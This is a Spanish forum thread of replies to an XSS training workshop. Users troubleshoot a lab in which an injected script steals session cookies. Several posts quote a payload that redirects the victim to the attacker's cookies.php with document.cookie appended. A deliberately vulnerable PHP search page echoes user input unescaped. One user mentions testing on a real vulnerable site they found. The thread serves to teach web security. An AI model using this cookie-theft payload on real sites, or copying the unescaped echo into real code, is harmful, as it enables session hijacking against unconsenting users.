Taller de Seguridad Web #1

Iniciado por ANTRAX, Septiembre 14, 2014, 05:13:14 PM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.

una duda por que al inyectar el codigo para robar cookies no me aprecen las cookies solo esto url/hacking/undercode/xss/visitas/cookies.php?cookie=(aqui no aparece nada)  espero y me puedan ayudar de antemano gracias  ;D

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta podrías dar un poco mas de detalles? no alcancé a entenderte bien

Saludos!
ANTRAX


bueno lo que pasa es que al momento de hacer pruebas de robo de cookies e inyectar  el codigo que dejaron (<script>window.location='No tienes permitido ver los links. Registrarse o Entrar a mi cuenta</script>) claro con la url mia donde esta alojado el .php solo queda asi  url/hacking/undercode/xss/visitas/cookies.php?cookie= en donde deberia arrojar las cookies solo esta en blanco(vi que debe de aparecer algo parecido a esto PHPSESSID=) ese espacio queda en blanco, las pruebas las hice con el index.php y el enviar.php que dejadon las subi tanto a mi servidor local y a un hosting pero solo se queda asi , crei que era la vercion de navegador y lo probe en el movil y quedo igual , disculpa por no tener un lenguaje amplio  en este tema , soy algo nuevo gracias :)

Proba poniendo esto asi:

<script>alert(document.cookie)</script>

Eso debería mostrarte la cookie en un alert y ahi te fijas si verdaderamente aparece algo en blanco


Muy bien escrito y fácil de entender, gracias por el aporte!
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Buenas. Tengo una duda con el taller, que por cierto me parece que está genial. Para robar la cookie se usa la página vulnerable message.php que es bastante más compleja que la que se propone para crear comentarios (index.php). ¿Está el código de esa página message.php accesible en algún lugar? Supongo que habrá una gestión de usuarios y creación de la cookie a robar.

Gracias y muy buen trabajo!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Buenas. Tengo una duda con el taller, que por cierto me parece que está genial. Para robar la cookie se usa la página vulnerable message.php que es bastante más compleja que la que se propone para crear comentarios (index.php). ¿Está el código de esa página message.php accesible en algún lugar? Supongo que habrá una gestión de usuarios y creación de la cookie a robar.

Gracias y muy buen trabajo!

La página message.php no es vulnerable, la que es vulnerable (ya que no filtra el XSS), es el index.php (la que muestra los mensajes).

La web que se utiliza es el típico libro de visitas.

Saludos.



Pero entonces no hay cookie que secuestrar. Index.php no genera ninguna cookie, ni se administra usuarios, al usar cookie.php meterá un valor en blanco.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pero entonces no hay cookie que secuestrar. Index.php no genera ninguna cookie, ni se administra usuarios, al usar cookie.php meterá un valor en blanco.

Existe la cookie de la sesión.

Saludos.



A ver. Estoy intentando capturar la Cookie del administrador.... ya tengo subido los dos archivos: cookie.php y cookies.txt , para eso creé un directorio en la raíz del host llamada XSS para hacer exactamente lo mismo que se hace en el tutorial ... ahora pongo el script exactamente así: <script>window.location='https://dominio/xss/cookies.php?cookie='+document.cookie;</script> ... pero no me captura nada ... cual podría ser mi error?. Veo que efectivamente cuando inyecto el script me redirige al archivo cookie.php en el host. Pero al ver el archivo cookies.txt no hay nada.

Tengo el mismo problema.
Estoy trabajando en un servidor gratuito y al poner el <script>alert(document.cookie);</script> me aparece en blanco.
Pero al ponerlo en una pagina vulnerable que encontré si me muestra la información.
Ayuda porfavor!!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Tengo el mismo problema.
Estoy trabajando en un servidor gratuito y al poner el <script>alert(document.cookie);</script> me aparece en blanco.
Pero al ponerlo en una pagina vulnerable que encontré si me muestra la información.
Ayuda porfavor!!

Eso me paso al principio pero repase el codigo y re-escribi los "" ' etc. asi se me soluciono.

He visto que varias personas tenía problemas con el código del buscador.php
Lo he modificado y ahora sí debería de funcionar.

Saludos.
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
A ver. Estoy intentando capturar la Cookie del administrador.... ya tengo subido los dos archivos: cookie.php y cookies.txt , para eso creé un directorio en la raíz del host llamada XSS para hacer exactamente lo mismo que se hace en el tutorial ... ahora pongo el script exactamente así: <script>window.location='https://dominio/xss/cookies.php?cookie='+document.cookie;</script> ... pero no me captura nada ... cual podría ser mi error?. Veo que efectivamente cuando inyecto el script me redirige al archivo cookie.php en el host. Pero al ver el archivo cookies.txt no hay nada.

Hola chicos, tengo el mismo problema que Voodo2k. ¿Cual sería la solución a esto?. Gracias, un abrazo.
En constante aprendizaje.

Hay un error en el codigo de "buscador.php"
En la linea 9 y 12, las comillas dobles del "buscar" deben reemplazarse por unas comillas simples '.
De manera que quede asi :
Código: text
<html>
        <head>
                <title>Resultado de la busqueda</title>
        </head>
        <body>
<center>
                        <img src="logo.png">
                        <?php
                        if(isset($_GET['buscar']))
                {
                  $busqueda= $_GET['buscar'];
                echo "<p align='center'>No se ha encontrado ningun resultado que contenga:" . $busqueda . "</p>";       
                }
                ?>
                </center>       
</body>
</html>


Buenas, gran taller amigo me acabo de enterar por el grupo ya que no me di cuenta de los talleres, aun que en la primera parte del tuto me aparecio un error de php en el buscador.php en la linea 9 exactamente, yo lo solucione cambiando las dos comillas que tenia a una solo y me dejo seguir por si alguien le paso. saludos!

Me ha gustado mucho y es ideal para mi como docente este tutorial,espero y pronto hagan una continuación de este taller, saludos

muchas gracias  por el aporte!
Siguiendo la Luna

Que buenola práctica. Excelente material

muy didáctico!! me encantó, saludos